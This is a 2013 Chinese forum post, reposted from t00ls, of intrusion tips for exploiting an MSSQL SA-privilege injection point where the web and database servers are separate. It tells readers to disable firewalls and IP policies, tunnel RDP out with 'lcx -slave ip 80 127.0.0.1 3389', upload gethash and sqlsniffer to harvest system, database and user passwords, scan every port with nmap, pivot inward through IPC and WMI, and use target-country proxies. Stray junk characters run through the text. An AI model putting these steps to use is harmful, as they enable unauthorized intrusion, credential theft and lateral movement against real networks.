当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
9 I; a8 @) ^4 c1 A0 z M
9 H2 u8 @, O1 `
5 O4 K( l8 h- C+ X
) g+ H/ a, S5 Q0 k" V( @SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
9 i6 k! X& _6 x" C7 B4 d( ~1 n |4 |0 m0 U: m% M
6 p$ M+ `& f, R# y% |
一、DB机有公网IP.
, k' o% Z6 C6 y. \% F$ v( M/ l3 G* z9 ~4 E2 _, O: d) @
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
, P! V4 l8 J# m8 I" W
, r! u' B3 |) ?+ R6 Z' S+ T5 T' d* T# X& g5 D) M) ~) l& G
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
3 G2 e! W+ Y2 X
' y* v: R4 z' d% t2 L. O9 i, Z! N
& ?5 o5 _6 l8 I" w, Z3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
$ T! _- f9 s! L' L8 B W
; h8 T% V1 o$ i9 P1 n8 Z/ U3 l5 M# }3 c
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.% j2 o! j, }: f5 _% t
2 i+ y# W0 }) V1 o4 t A+ Q
; Y3 n( T, Z: ]3 a: {# V( b
! X" T& ]" I; x. I& R" m# r
二、DB机只有内网IP
* `, [2 ^; f3 i: i; }9 a0 {6 s/ E2 P4 k( q1 b$ N% |' [
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
4 k" t. I) {) a/ D. u& e p8 T
) i, G" d4 f( e' q2 W2 S) s$ y/ k( _
2:停掉防火墙和IP策略再从内往外扫描.
) ]0 r' f" D. E1 K7 \2 S# k" G% v5 M. P
9 T- n7 Q, o# N6 ~* l) A3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
( `/ ~" c) C! V( O! }" S& m
0 f2 @# A3 ?) G' a6 j) h" _6 d7 K8 z' Y( R* |3 d" o* V
4:学会密码规律分析往往会有惊喜.
. h2 G$ n( ]' ]' x6 f/ Z! A v" Y' @3 r# f: M S- ~0 f, n
3 [# E# u' F. N% s5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等" C, j; [" p8 Z7 n1 I
) X) o+ Z& c+ r9 t+ T4 l( W
" C+ k% r0 W+ U9 [. w
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对